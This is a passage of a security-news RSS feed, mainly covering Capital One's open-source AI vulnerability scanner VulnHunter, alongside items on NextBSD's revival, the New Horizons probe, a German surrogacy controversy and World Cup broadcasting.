<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><br>See the technology stories that people were reading on GeekWire for the week of July 12, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-07-12/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[NextBSD Returns to Port Apple Source Onto FreeBSD]]></title>
<description><![CDATA["One of the most interesting BSD variants of the 2010s, NextBSD, has come back to life under new management," reports The Register:


Aside from the homepage, there's a GitHub repository — but beware, this is separate from the old one, whose repo is still there although the most recent changes we...]]></description>
<link>https://tsecurity.de/de/3678414/it-security-nachrichten/nextbsd-returns-to-port-apple-source-onto-freebsd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678414/it-security-nachrichten/nextbsd-returns-to-port-apple-source-onto-freebsd/</guid>
<pubDate>Sat, 18 Jul 2026 20:52:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["One of the most interesting BSD variants of the 2010s, NextBSD, has come back to life under new management," reports The Register:


Aside from the homepage, there's a GitHub repository — but beware, this is separate from the old one, whose repo is still there although the most recent changes were seven years ago. The new project also has a project history giving credit where it's due. The main man behind the revival is Joe Maloney, known on GitHub as pkgdemon. In case his name rings a bell, we've mentioned him before: he put together the Gershwin desktop in GhostBSD. Soon after we covered Gershwin on GhostBSD, he asked the maintainers if he could take over the NextBSD project. He did have a relatively minor role in the original — you can see his list of commits. 


The original NextBSD project was started by FreeBSD co-founder Jordan Hubbard in 2015 — its Wikipedia article has some of the history. The plan was to port some of the components of Apple's Darwin OS to FreeBSD... [T]he NextBSD plan is to take the FreeBSD kernel, the most capable of the FOSS BSD kernels, but replace FreeBSD's traditional and server-focused userland with the relevant parts of the publicly available Apple code. The rebooted NextBSD-redux is not based on a fork of the decade-old code. FreeBSD has moved on substantially in that time, and so have macOS and Darwin. This is a new project by a new developer, but it picks up the same overall plan, aims to assemble the same puzzle pieces, and shares the same intended goal. 


In places, it does draw on a little of the same code, though. The NextBSD-redux README describes what's working so far, with a lot more detail in the porting notes. Although there's no graphical desktop yet, that's underway as well.... For us, perhaps the key aspect of NextBSD — both the original version and NextBSD-redux — is that it isn't an effort to build something completely new from scratch. It's an effort to cherry-pick and combine elements of existing separate FOSS projects, and assemble them into a useful whole. 


The Team section of the homepage lists two core developers: Maloney and Anthropic's Claude Code. "From my perspective, AI is a force multiplier here," Maloney told The Register. "It is my team of developers, but I am steering the entire thing."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=NextBSD+Returns+to+Port+Apple+Source+Onto+FreeBSD%3A+https%3A%2F%2Fbsd.slashdot.org%2Fstory%2F26%2F07%2F18%2F1843243%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fbsd.slashdot.org%2Fstory%2F26%2F07%2F18%2F1843243%2Fnextbsd-returns-to-port-apple-source-onto-freebsd%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://bsd.slashdot.org/story/26/07/18/1843243/nextbsd-returns-to-port-apple-source-onto-freebsd?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Long After Pluto Fly-By, NASA's New Horizon's Probe Wakes Up Again, Starts Doing New Science]]></title>
<description><![CDATA[Launched in 2006, NASA's New Horizons probe flew by the planet Pluto in 2015. But this week it "awakened from its longest sleep ever," reports CNN.

It's now 5.9 billion miles (9.5 billion kilometers) from Earth...


NASA's New Horizons spacecraft went into a planned hibernation mode on August 7,...]]></description>
<link>https://tsecurity.de/de/3678309/it-security-nachrichten/long-after-pluto-fly-by-nasas-new-horizons-probe-wakes-up-again-starts-doing-new-science/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678309/it-security-nachrichten/long-after-pluto-fly-by-nasas-new-horizons-probe-wakes-up-again-starts-doing-new-science/</guid>
<pubDate>Sat, 18 Jul 2026 19:16:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Launched in 2006, NASA's New Horizons probe flew by the planet Pluto in 2015. But this week it "awakened from its longest sleep ever," reports CNN.

It's now 5.9 billion miles (9.5 billion kilometers) from Earth...


NASA's New Horizons spacecraft went into a planned hibernation mode on August 7, 2025, and woke up on June 23 using commands stored on its main computer. The mission's flight controllers at the Johns Hopkins University's Applied Physics Laboratory in Laurel, Maryland, confirmed that New Horizons is in great shape and ready to transmit a stream of science data gathered during hibernation from its location in the region of icy objects known as the Kuiper Belt. 


Pluto is the largest of thousands of frozen, rocky bodies called trans-Neptunian objects, or TNOs, that exist in the Kuiper Belt at the edge of our solar system — remnants from its formation 4.5 billion years ago... The spacecraft is capturing data about the rotation rates, orientations and shapes... The measurements provide insights into how planets are born from dust and pebbles, said Pontus Brandt, New Horizons project scientist at the Johns Hopkins Applied Physics Laboratory.
"There seems to be more paired, snowman-shaped bodies, like Arrokoth, out there than anyone expected," Brandt wrote in an email. "Are such binaries the most common planetesimal and is this how larger planets have been built in our own and other stellar systems? These are very deep questions that New Horizons can help answer." 


The spacecraft also measures the distribution of gas in the outer heliosphere, the expansive, protective bubble formed by a steady stream of particles that release from the sun called the solar wind. Meanwhile, an instrument called the Pluto Energetic Particle Spectrometer Science Investigation is measuring galactic cosmic rays, extremely fast particles created when stars explode. The particles pose one of the more severe threats for human activities in space, Brandt said, but the boundary of the heliosphere acts as a shield to protect our solar system from 70% of them. New Horizons' data could help scientists learn more about how this puzzling shielding works, he said. 

Another instrument, the Venetia Burney Student Dust Counter, has collected data that has thrown New Horizon's team a curveball, Brandt said. The team expected dust abundance to be high within the Kuiper Belt due to the significant presence of small objects. But New Horizons has traveled beyond the known boundary of the Kuiper Belt — and it's still in a dusty environment.

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Long+After+Pluto+Fly-By%2C+NASA's+New+Horizon's+Probe+Wakes+Up+Again%2C+Starts+Doing+New+Science%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F18%2F0537208%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F18%2F0537208%2Flong-after-pluto-fly-by-nasas-new-horizons-probe-wakes-up-again-starts-doing-new-science%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/18/0537208/long-after-pluto-fly-by-nasas-new-horizons-probe-wakes-up-again-starts-doing-new-science?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RÜCKTRITT wegen Baby! Jens Spahns Leihmutter-Dilemma]]></title>
<description><![CDATA[Author: WBS LEGAL - Bewertung: 164x - Views:2127 Dein BAföG-Antrag wurde abgelehnt, falsch berechnet oder nicht bearbeitet? Wir helfen dir. ➔ https://wbs.law/bafoeg

Einer deiner Social-Media-Accounts, PayPal- oder ähnliches wurde gesperrt? ➔ https://wbs.law/account-gesperrt

Du hast eine Abmahnu...]]></description>
<link>https://tsecurity.de/de/3678221/videos/ruecktritt-wegen-baby-jens-spahns-leihmutter-dilemma/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678221/videos/ruecktritt-wegen-baby-jens-spahns-leihmutter-dilemma/</guid>
<pubDate>Sat, 18 Jul 2026 18:04:50 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: WBS LEGAL - Bewertung: 164x - Views:2127 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/yxJJCNu0xsc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Dein BAföG-Antrag wurde abgelehnt, falsch berechnet oder nicht bearbeitet? Wir helfen dir. ➔ https://wbs.law/bafoeg<br />
<br />
Einer deiner Social-Media-Accounts, PayPal- oder ähnliches wurde gesperrt? ➔ https://wbs.law/account-gesperrt<br />
<br />
Du hast eine Abmahnung wegen angeblichen illegalen Downloads erhalten? ➔ https://wbs.law/filesharing<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
<br />
Ein Familienfoto, ein Sturm der Empörung und nur drei Tage später der Rücktritt: Jens Spahn gibt den Vorsitz der Unionsfraktion ab, nachdem er und sein Ehemann mithilfe einer Leihmutter in den USA Eltern geworden sind. Hat Spahn deutsches Recht umgangen oder ist sein Vorgehen legal? Wir rekonstruieren die Eskalation, prüfen seine früheren Aussagen und erklären, wen das deutsche Verbot tatsächlich trifft.<br />
<br />
Tagesschau – Rücktritt und Schreiben im Wortlaut: https://www.tagesschau.de/inland/innenpolitik/jens-spahn-ruecktritt-100.html<br />
ZDFheute – War Spahns Vorgehen legal?: https://www.zdfheute.de/panorama/jens-spahn-leihmutterschaft-legal-100.html<br />
GQ – Spahns Gastbeitrag von 2015: https://www.gq-magazin.de/leben-als-mann/features/pro-contra-leihmutterschaft-respektiert-meine-zurueckhaltung<br />
Deutscher Bundestag – Antwort der Bundesregierung 2020: https://www.bundestag.de/webarchiv/presse/hib/2020_04/693042-693042<br />
CDU – Anträge des 38. Parteitags, Antrag O06 auf S. 383: https://www.cdu.de/app/uploads/2026/02/202602_Sammlung-der-Antraege_38-Parteitag.pdf<br />
BGH – Beschluss XII ZB 463/13: https://juris.bundesgerichtshof.de/cgi-bin/bgh_notp/document.py?Art=en&Datum=2014-12&Gericht=bgh&Seite=4&anz=229&nr=34692&pos=137<br />
Auswärtiges Amt – FAQ zur Leihmutterschaft: https://www.auswaertiges-amt.de/de/service/fragenkatalog-node/06-leihmutterschaft-606160<br />
BMG – Bericht der Kommission zur reproduktiven Selbstbestimmung: https://www.bundesgesundheitsministerium.de/presse/pressemitteilungen/kommissionsbericht-reproduktive-selbstbestimmung-pm-15-04-24<br />
Ronzheimer-Podcast – Interview mit Jens Spahn: https://www.youtube.com/watch?v=WRIMLz5bh3g<br />
Tagesschau/NDR – Rücktrittsforderung von Daniel Peters: https://www.tagesschau.de/inland/regional/mecklenburgvorpommern/kritik-an-leihmutterschaft-cdu-in-mv-fordert-spahns-ruecktritt%2Cspahn-746.html<br />
Deutschlandfunk – Interview mit Wolfgang Bosbach: https://www.deutschlandfunk.de/spahns-leihmutterschaft-interview-mit-wolfgang-bosbach-cdu-100.html<br />
Reddit r/de – Debatte vor dem Rücktritt: https://www.reddit.com/r/de/comments/1uyvkdj/umstrittene_leihmutterschaft_erster/<br />
Reddit r/de – Reaktionen auf den Rücktritt: https://www.reddit.com/r/de/comments/1uztkrb/jens_spahn_tritt_als_unionsfraktionschef_zur%C3%BCck/<br />
Tagesschau/NDR – Internationales Leihmuttergeschäft: https://www.tagesschau.de/investigativ/ndr/leihmuetter-geschaeft-international-100.html<br />
§ 1 ESchG: https://www.gesetze-im-internet.de/eschg/__1.html<br />
§ 13b AdVermiG: https://www.gesetze-im-internet.de/advermig_1976/__13b.html<br />
§ 13c AdVermiG: https://www.gesetze-im-internet.de/advermig_1976/__13c.html<br />
§ 14b AdVermiG: https://www.gesetze-im-internet.de/advermig_1976/__14b.html<br />
§ 1591 BGB: https://www.gesetze-im-internet.de/bgb/__1591.html<br />
§ 1592 BGB: https://www.gesetze-im-internet.de/bgb/__1592.html<br />
§ 108 FamFG: https://www.gesetze-im-internet.de/famfg/__108.html<br />
§ 109 FamFG: https://www.gesetze-im-internet.de/famfg/__109.html<br />
<br />
<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
WBS.LEGAL sucht dich! Du bist auf der Suche nach einem attraktiven, spannenden und anspruchsvollen Job? Dann bewirb dich bei uns und komm in unser Team. Bei WBS.LEGAL arbeitest du im Herzen der Medienhauptstadt Köln und bist im Berufsleben immer am Puls der Zeit – garantiert. Hier unsere offenen Stellenangebote: https://www.wbs.legal/karriere/#jobs Was erwartet dich bei uns? Hier bekommst du weitere Infos: https://www.wbs.legal/karriere/. <br />
<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
Rechtsanwalt Prof. Christian Solmecke Prof. Christian Solmecke hat sich als Rechtsanwalt und Partner der Kölner Medienrechtskanzlei WBS.LEGAL auf die Beratung der Internet-, IT- und Medienbranche spezialisiert. So hat er in den vergangenen Jahren den Bereich Internetrecht/E-Commerce der Kanzlei stetig ausgebaut und betreut zahlreiche Medienschaffende, Web-2.0-Plattformen und App- Entwickler. Neben seiner Tätigkeit als Rechtsanwalt ist Prof. Christian Solmecke vielfacher Buchautor und als Gründer der cloudbasierten Kanzleisoftware Legalvisio.de auch erfolgreicher LegalTech-Unternehmer.<br />
<br />
 ▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
Virtueller Kanzlei-Rundgang: https://wbs.law/rundgang Startet euren Rundgang in 3D und 360° durch die Kanzlei WBS.LEGAL (inkl. YouTube- Studio) <br />
<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
Social-Media-Kanäle von WBS.LEGAL Wir freuen uns, wenn du uns auch auf unseren weiteren Social-Media-Kanälen besuchst und uns dort folgst. Jeder unserer Kanäle steht für sich und bringt dir garantiert einen Mehrwert. <br />
<br />
<br />
<br />
▬Kontakt▬ <br />
Hotline: 0221 / 400 67 550 E-Mail: info@wbs.legal<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Goooool v goal: English speakers flock to Telemundo for lively World Cup coverage]]></title>
<description><![CDATA[The Spanish-language broadcaster has won over millions of US viewers with its energetic commentary during gamesSoccer fans looking to watch the 2026 World Cup on US television have been presented with two very different options this tournament.The first is Fox Sports, a cousin of Fox News owned b...]]></description>
<link>https://tsecurity.de/de/3678123/it-nachrichten/goooool-v-goal-english-speakers-flock-to-telemundo-for-lively-world-cup-coverage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678123/it-nachrichten/goooool-v-goal-english-speakers-flock-to-telemundo-for-lively-world-cup-coverage/</guid>
<pubDate>Sat, 18 Jul 2026 16:17:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Spanish-language broadcaster has won over millions of US viewers with its energetic commentary during games</p><p>Soccer fans looking to watch the <a href="https://www.theguardian.com/football/world-cup-2026">2026 World Cup</a> on US television have been presented with two very different options this tournament.</p><p>The first is <a href="https://www.theguardian.com/football/2026/jul/17/fox-world-cup-coverage-us-2026">Fox Sports</a>, a cousin of Fox News owned by the same parent company and the sole network airing matches in English in the US. Audiences tuning in to Fox, which acquired the exclusive English broadcast rights in 2015, are met with coverage that reflects the network’s “America first” aesthetic, with promos for pro-Donald Trump talkshows, advertising breaks during games and the frequent, <a href="https://www.theguardian.com/football/2026/jun/21/thierry-henry-alexi-lalas-fox-world-cup">grating presence</a> of host Alexi Lalas.</p> <a href="https://www.theguardian.com/football/2026/jul/17/telemundo-world-cup-english-speaking-viewers">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Capital One releases VulnHunter, an open-source AI tool that finds software flaws before hackers do]]></title>
<description><![CDATA[Capital One on Thursday released VulnHunter, an open-source, agentic AI security tool that scans source code for exploitable vulnerabilities, maps out how an attacker would reach them, and proposes targeted fixes — all before a single line ships to production. The tool, built internally and now a...]]></description>
<link>https://tsecurity.de/de/3677035/it-nachrichten/capital-one-releases-vulnhunter-an-open-source-ai-tool-that-finds-software-flaws-before-hackers-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677035/it-nachrichten/capital-one-releases-vulnhunter-an-open-source-ai-tool-that-finds-software-flaws-before-hackers-do/</guid>
<pubDate>Fri, 17 Jul 2026 23:02:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.capitalone.com/">Capital One</a> on Thursday released <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a>, an open-source, agentic AI security tool that scans source code for exploitable vulnerabilities, maps out how an attacker would reach them, and proposes targeted fixes — all before a single line ships to production. The tool, built internally and <a href="https://github.com/capitalone/vulnhunter">now available on GitHub</a> under an Apache 2.0 license, is one of the most ambitious attempts by a major financial institution to turn offensive AI capabilities into a public defensive resource.</p><p>The move marks a striking philosophical turn for a company still defined, in many boardrooms, by a <a href="https://www.capitalone.com/digital/facts2019/">2019 data breach</a> that compromised the personal information of roughly 106 million people across the United States and Canada and ultimately cost the bank an <a href="https://www.occ.gov/news-issuances/news-releases/2020/nr-occ-2020-101.html">$80 million federal fine</a>.</p><p>Capital One is not simply releasing another vulnerability scanner. VulnHunter introduces what the company calls an "<a href="https://github.com/capitalone/vulnhunter">attacker-first forward analysis</a>" — a workflow in which the tool begins at the points where a real adversary would enter a system, such as APIs, network messages, or file uploads, and reasons forward through the application's logic to determine whether an exploit path actually survives the code's existing defenses. Conventional scanners typically work in reverse, flagging a dangerous-looking code pattern and then searching backward for a hypothetical attacker. That approach, security practitioners widely acknowledge, buries engineering teams under avalanches of false positives.</p><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> attacks that problem head-on with a second innovation: a built-in "falsification engine" that tries to disprove its own findings before a developer ever sees them. After the tool surfaces a potential vulnerability, a structured reasoning workflow hunts for logical gaps, unsupported assumptions, and conditions that would prevent the attack from succeeding. Only findings the engine fails to rule out reach a human reviewer — and when they do, VulnHunter delivers not just an alert but a full explanation of the exploit path and a proposed code fix ready for engineering review.</p><p>The tool currently runs on Anthropic's <a href="https://www.anthropic.com/news/claude-opus-4-8">Claude Opus 4.8 model</a> inside a Claude Code environment, though Capital One says the framework has the potential to work across other foundation models and coding harnesses.</p><h2><b>The 2019 breach that reshaped how Capital One thinks about cybersecurity</b></h2><p>To understand why Capital One chose to open-source a tool this consequential, you have to understand the scar tissue.</p><p>On July 19, 2019, <a href="https://www.capitalone.com/digital/facts2019/">Capital One disclosed </a>that an outside individual — later identified as a former Amazon Web Services employee named Paige Thompson — had gained unauthorized access to names, addresses, self-reported income, Social Security numbers, and linked bank account numbers belonging to credit card customers and applicants. The breach, which Capital One says occurred on March 22 and 23, 2019, was discovered only after an external security researcher flagged a configuration vulnerability through the company's <a href="https://www.capitalone.com/digital/responsible-disclosure/">Responsible Disclosure Program</a> on July 17 of that year.</p><p>The damage was sweeping. Approximately <a href="https://www.npr.org/2019/07/30/746687015/100-million-people-in-the-u-s-affected-by-capital-one-data-breach">100 million people in the United States</a> and 6 million in Canada were affected. Roughly 140,000 Social Security numbers, about 80,000 linked bank account numbers, and approximately 1 million Canadian Social Insurance Numbers were compromised. The FBI arrested Thompson, and the government stated it believed the data had been recovered with no evidence of fraud. But the reputational and regulatory toll was enormous.</p><p>In August 2020, the Office of the Comptroller of the Currency <a href="https://www.occ.gov/news-issuances/news-releases/2020/nr-occ-2020-101.html">fined Capital One $80 million</a>, finding that the bank had failed to adequately identify and manage risks as it migrated significant technology operations to the cloud. As Reuters reported at the time, the OCC's consent order cited insufficient network security controls, inadequate data loss prevention measures, and a board that failed to hold management accountable when internal auditing surfaced problems. The OCC also ordered Capital One to overhaul its operations and submit new cybersecurity plans for regulatory review.</p><p>The incident became an industry case study in the dangers of moving fast with new technology. As <a href="https://cyberscoop.com/capital-one-hack-banking-security/">CyberScoop reported</a> in July 2019, a cybersecurity executive at a competing financial company observed that the breach "could be the result of trying too many new things and forcing them through." Capital One's own CEO, Richard D. Fairbank, acknowledged the gravity of the moment. "While I am grateful that the perpetrator has been caught, I am deeply sorry for what has happened," Fairbank said at the time. "I sincerely apologize for the understandable worry this incident must be causing those affected and I am committed to making it right."</p><h2><b>How Capital One rebuilt its security reputation through open-source investment</b></h2><p>What followed was not a retreat from technology but a doubling down — with security explicitly at the center.</p><p>Capital One had declared itself an "<a href="https://capitalonesoftware.com/blog/cloud-migration-journey">open-source first</a>" company in 2015 as part of a broader technology transformation that began over a decade ago. After the breach, the company accelerated its investments in software supply chain security, open-source governance, and AI-driven defense. In August 2022, Capital One joined the <a href="https://openssf.org/">Open Source Security Foundation</a> as a premier member, earning a seat on the organization's Governing Board. Chris Nims, then EVP of Cloud &amp; Productivity Engineering, framed the move as a natural extension of the company's operating philosophy. "As a highly-regulated company, we are seasoned in managing compliance and governance and advocate for standardization, automation and collaboration," Nims said in the <a href="https://openssf.org/press-release/2022/08/24/capital-one-joins-open-source-security-foundation/">OpenSSF announcement</a>.</p><p>Behind that public commitment lay a substantial operational apparatus. Capital One's <a href="https://www.capitalone.com/tech/open-source/">Open Source Program Office</a>, now in its third iteration, manages open-source usage, contributions, and community building across the enterprise. The company has released more than 25 open-source projects and made over 2,000 contributions to approximately 135 external open-source projects, according to the company's own disclosures. Those efforts address not just code dependencies but the entire software development lifecycle — DevSecOps tools, infrastructure, and the collaborative environments, both internal and external, that shape how software gets built and shipped.</p><p>Nureen D'Souza, the director who leads Capital One's OSPO, has spoken publicly about the philosophy underpinning this work. At cdCon 2022, D'Souza described a "company-wide culture with security ingrained" that allows developers to focus on innovation rather than maintenance chores, as <a href="https://sdtimes.com/os/how-capital-one-is-strengthening-the-software-supply-chain/">reported by SD Times</a>. The OSPO's charter emphasizes three pillars: standardization of open-source processes, automation of security policies throughout the delivery pipeline, and ecosystem sustainability through upstream contributions to the foundations and projects the company depends on.</p><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> is the most consequential product of that multi-year effort — and the clearest signal yet that Capital One views open-source collaboration not as charity but as a competitive security strategy. The company argues that modern software supply chains are so deeply interconnected that a single vulnerability in a widely used open-source component can cascade across thousands of enterprises simultaneously. Proprietary defenses, no matter how sophisticated, cannot address a problem that is fundamentally communal. By releasing VulnHunter under a permissive license, Capital One invites the global security research community to stress-test, extend, and improve the tool — effectively crowdsourcing its own defense infrastructure while strengthening the broader ecosystem.</p><h2><b>Inside VulnHunter's three-stage AI engine for finding exploitable code</b></h2><p>For engineering leaders evaluating <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a>, the technical architecture is where the tool's ambitions become concrete. The workflow unfolds in three distinct stages.</p><p>In the first stage — attacker-first forward analysis — VulnHunter begins at the points where an external adversary would interact with a system: API endpoints, network message handlers, file upload interfaces. From each entry point, the tool reasons forward through application logic, tracing data flows, transformations, and internal security checkpoints to determine whether an attacker can actually reach a dangerous code path. This approach mirrors how a skilled penetration tester would probe a system, but automates the process at a scale no human team could match.</p><p>The second stage is where VulnHunter departs most sharply from conventional scanners. After identifying a potential vulnerability, the falsification engine runs a structured reasoning workflow designed to disprove its own conclusion. It searches for assumptions that do not hold, logical gaps in the exploit path, and environmental conditions that would prevent an attack from succeeding. Findings that fail this internal challenge are discarded before any developer sees them. Capital One's explicit goal is to shift the developer's burden away from triaging false alarms — a perennial pain point that erodes trust in security tooling and slows development velocity.</p><p>In the third stage, vulnerabilities that survive the falsification engine trigger an evidence-backed remediation workflow. VulnHunter gathers supporting evidence across the codebase, maps the complete surviving exploit path, explains the defect and the specific capabilities an attacker would gain, and generates targeted code changes for engineering review. The output is not a generic advisory but a concrete, context-aware patch proposal.</p><p>Capital One says it validated VulnHunter internally before release, running it across thousands of repositories spanning tens of business areas. The company reports that the tool identified and remediated vulnerabilities with speed and efficiency that far exceeded what its teams previously achieved through manual triage.</p><h2><b>Why AI-powered attacks are forcing banks to rethink traditional cyber defenses</b></h2><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> arrives at a moment when the cybersecurity landscape is shifting beneath the feet of every enterprise. Capital One's announcement frames the urgency in stark terms: advanced AI models have "dramatically lowered the barrier for bad actors to discover and exploit vulnerabilities in software," and the window before sophisticated AI attack capabilities become affordable and accessible to virtually every adversary is shrinking rapidly.</p><p>The company's own AI security researchers have been tracking these trends closely. At <a href="https://www.capitalone.com/tech/software-engineering/secon-2024/">NeurIPS 2024</a> in Vancouver, Capital One's team presented research and curated a list of nearly 100 papers spanning LLM safety, adversarial resilience, jailbreak attacks, and synthetic data generation. The papers they highlighted — including work on multi-agent defense frameworks, automated red-teaming, and guardrail classifiers — paint a picture of an arms race in which offensive and defensive AI capabilities are co-evolving at breakneck speed.</p><p>Several of those research themes map directly onto VulnHunter's architecture. The falsification engine echoes the adversarial defense strategies explored in papers like "<a href="https://pure.psu.edu/en/publications/backdooralign-mitigating-fine-tuning-based-jailbreak-attack-with-/fingerprints/?sortBy=alphabetically">BackdoorAlign</a>," which demonstrated that embedding a structured safety mechanism into a small number of training examples could recover a model's safety alignment without degrading performance. The attacker-first forward analysis reflects the philosophy of "<a href="https://arxiv.org/html/2406.18510v1">WildTeaming</a>," a framework that collects and analyzes real-world jailbreak attempts to build more resilient models. And VulnHunter's emphasis on minimizing false positives parallels the goals of "GuardFormer," a guardrail classifier that outperformed GPT-4 on safety benchmarks while running 14 times faster.</p><p>The thread connecting all of this work is a conviction that traditional, reactive security — monitoring networks, patching known vulnerabilities, responding to incidents after they occur — is no longer sufficient when adversaries can use AI to discover and exploit zero-day vulnerabilities at machine speed. The only durable defense, Capital One argues, is to find and fix the vulnerabilities in your own code before attackers find them first.</p><h2><b>What Capital One's cloud security journey reveals about the entire banking industry</b></h2><p>Capital One's arc from breach victim to open-source security contributor also illuminates a broader reckoning across financial services. When Capital One <a href="https://www.latimes.com/business/story/2019-07-30/capital-one-cloud-safety-hacker-breach">moved aggressively to Amazon Web Services</a> in the mid-2010s, it was a rarity among major banks. Most financial institutions simply did not trust third parties to store their most sensitive data. Capital One's CIO at the time, Rob Alexander, <a href="https://www.forbes.com/sites/peterhigh/2016/12/12/how-capital-one-became-a-leading-digital-bank/">publicly championed the cloud</a> as more secure than the bank's own data centers — a claim that the 2019 breach complicated considerably.</p><p>The <a href="https://cyberscoop.com/capital-one-hack-banking-security/">CyberScoop report</a> from that period captured the tension within the industry. W. Patrick Opet, managing director of cybersecurity at JP Morgan Chase, described a cultural shift in banking from prioritizing traders to prioritizing developers: "Now, it's 'Focus on the developer, turn everything into code, and automate everything.'" Mark Nicholson, Deloitte's cyber leader for the financial industry, noted that the pressure to move quickly was exposing "weaknesses in the development methodology." And the breach itself was a reminder that even as Chase spent $600 million annually on cybersecurity, relatively simple vulnerabilities — like the Apache Struts bug that enabled the Equifax breach — could undercut massive investments in data protection.</p><p>Seven years later, the industry has largely followed Capital One into the cloud, and the security challenges have only intensified. The question is no longer whether to use cloud infrastructure but how to secure the software that runs on it. VulnHunter represents Capital One's answer: rather than relying solely on network-level controls and perimeter defenses, push security directly into the code itself, at the moment it is written. The open-source release also carries implicit competitive pressure. If VulnHunter gains traction among developers and security teams, it could set a new baseline for what enterprise security tooling is expected to do — and force rival banks, fintechs, and cloud providers to match or exceed its capabilities.</p><p>Whether <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> lives up to that ambition will depend on adoption, community engagement, and the tool's real-world performance against the increasingly sophisticated AI-powered attacks it was designed to counter. But the release itself tells a story that extends well beyond any single tool or any single company. In 2019, a misconfigured firewall exposed 100 million records and turned Capital One into a cautionary tale about the cost of moving fast without moving carefully. In 2026, the same institution is open-sourcing the kind of AI-driven defense it wishes it had built sooner — and betting that the best way to protect its own code is to help the entire industry protect theirs.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zurück in die 80er: Schaffst unser Quiz zum Kult-Jahrzehnt, ohne zu schummeln?]]></title>
<description><![CDATA[Holt den Walkman raus, packt „Like a Virgin“ von Madonna rein und stellt euch auf eine Zeitreise wie in „Zurück in die Zukunft“ ein, wenn ihr euch mental für unser 80er-Jahre-Quiz eingrooven möchtet. Egal, ob ihr eure Jugend mit Haarspray und Schulterpolstern auf der Tanzfläche oder mit einem Sta...]]></description>
<link>https://tsecurity.de/de/3676286/it-nachrichten/zurueck-in-die-80er-schaffst-unser-quiz-zum-kult-jahrzehnt-ohne-zu-schummeln/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676286/it-nachrichten/zurueck-in-die-80er-schaffst-unser-quiz-zum-kult-jahrzehnt-ohne-zu-schummeln/</guid>
<pubDate>Fri, 17 Jul 2026 16:18:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Holt den Walkman raus, packt „Like a Virgin“ von Madonna rein und stellt euch auf eine Zeitreise wie in „Zurück in die Zukunft“ ein, wenn ihr euch mental für unser 80er-Jahre-Quiz eingrooven möchtet. Egal, ob ihr eure Jugend mit Haarspray und Schulterpolstern auf der Tanzfläche oder mit einem Stapel Floppys vor dem Röhrenmonitor verbracht habt, wenn ihr dieses Jahrzehnt miterlebt habt, werdet ihr sicher auch eine hohe Punktzahl abräumen können – oder habt ihr schon alles von damals vergessen?]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4760 | Oracle Java SE 6u95/7u80/8u45 2D information disclosure (RHSA-2015:1229 / Nessus ID 84930)]]></title>
